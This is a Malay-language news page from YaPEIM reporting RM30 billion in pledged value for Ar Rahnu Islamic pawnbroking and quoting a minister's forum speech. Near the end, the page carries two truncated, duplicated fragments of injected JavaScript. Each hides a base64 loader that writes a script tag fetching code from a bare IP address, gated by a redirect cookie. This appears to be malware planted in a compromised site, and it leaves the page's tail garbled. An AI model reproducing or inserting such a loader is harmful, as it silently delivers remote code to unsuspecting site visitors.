YaPEIM » RM30 bilion nilai marhum gadaian Ar Rahnu manfaatkan ummah

Terkini

RM30 bilion nilai marhum gadaian Ar Rahnu manfaatkan ummah

Dinyatakan Dato’ Seri Jamil Khir Baharom dalam ForNasional: Jumlah nilai marhum untuk semua pengendali pajak gadai Islam Ar Rahnu di negara ini berjumlah RM30 bilion

KUALA LUMPUR: Program Mikro Kredit Ar Rahnu oleh Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM), institusi perbankan dan koperasi mencatatkan jumlah nilai marhum RM30 bilion sejak penubuhannya pada tahun 1993.

Menteri di Jabatan Perdana Menteri, Mejar Jeneral Dato’ Seri Jamil Khir Baharom berkata, program berkenaan telah berjaya membantu masyarakat untuk mendapatkan pembiayaan kewangan mengikut hukum Syarak, sekali gus menyelamatkan barangan kemas mereka daripada bertukar tangan.

“Saya percaya jika kesemua maklumat daripada semua pelaksana Ar Rahnu dapat dikumpulkan oleh institusi seperti YaPEIM, maka jumlahnya adalah jauh lebih besar,” katanya semasa merasmikan Forum Ar-Rahnu Nasional (ForNasional) anjuran YaPEIM, di Grand Seasons Avenue,  pada 14 September lalu.

Teks ucapan beliau dibacakan Timbalan Menteri di Jabatan Perdana Menteri, Senator Dato’ Dr. Asyraf Wajdi Dusuki.

Turut hadir dalam majlis itu Presiden yang juga Pengerusi Lembaga Pemegang Amanah YaPEIM, Dato’ Abd Malek Awang Kechil dan Ketua Pengarah YaPEIM yang juga Ketua Eksekutif Kumpulan YaPEIM, Dato’ Abibullah Samsudin.

Ar Rahnu (Pajak Gadai Islam) telah diinisiatifkan oleh YaPEIM berdasarkan keputusan mesyuarat Jemaah Menteri pada 30 Januari 1985 yang bersetuju dengan kertas cadangan “Penubuhan Pajak Gadai Islam”.

Akhirnya Projek perintis Ar Rahnu telah diperkenalkan oleh YaPEIM melalui Bank Kerjasama Rakyat Malaysia (Bank Rakyat) pada 27 Oktober 1993. Peluasan pelaksanaan telah dibuat melalui Bank Islam Malaysia Berhad (BIMB) pada November 1997 sehingga tahun 2004 dan seterusnya melalui Koperasi YaPEIM Berhad (Koperasi YaPEIM) pada 2 Oktober 2000 dengan mewujudkan Jawatankuasa Pemandu Bank Negara Malaysia-YaPEIM.

Jamil Khir berkata, sistem pajak gadai Islam, Ar-Rahnu juga perlu sentiasa diberi nilai tambah dari semasa ke semasa dengan menjadikan inovasi sebagai panduan bagi manfaat masyarakat.

“Kita berasa bangga kerana Program Mikro Kredit Ar Rahnu ini telah berkembang dengan pesatnya di Malaysia kerana ia bukan sahaja ditawarkan oleh YaPEIM, Bank Islam dan Bank Rakyat malahan terdapat beberapa buah institusi lain yang menunjukkan minat yang sama dengan mewujudkan Program Mikro Kredit Ar Rahnu seperti Agrobank, Bank Muamalat, RHB Bank, MAIDAM, Pos  Malaysia dan sebagainya.

“Kewujudan Program Mikro Kredit Ar Rahnu daripada institusi-institusi ini bukanlah bertujuan untuk bersaing, sebaliknya inisiatif tersebut untuk mengembangkan produk yang memenuhi tuntutan Syarak untuk membebaskan masyarakat Malaysia khususnya yang beragama Islam supaya tidak terlibat dalam amalan riba,” katanya.

Beliau berkata, program ar rahnu telah dikembangkaan ke negara-negara serantau dengan inisiatif YaPEIM iaitu Indonesia, Brunei Darussalam dan Thailand.

Negara-negara serantau yang akan menyusul dengan program ini ialah Cambodia, Singapura, Filipina dan Vietnam yang diselaraskan  oleh  Sekretariat Ar Rahnu Serantau  yang ditubuhkan pada tahun 2004.

 

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top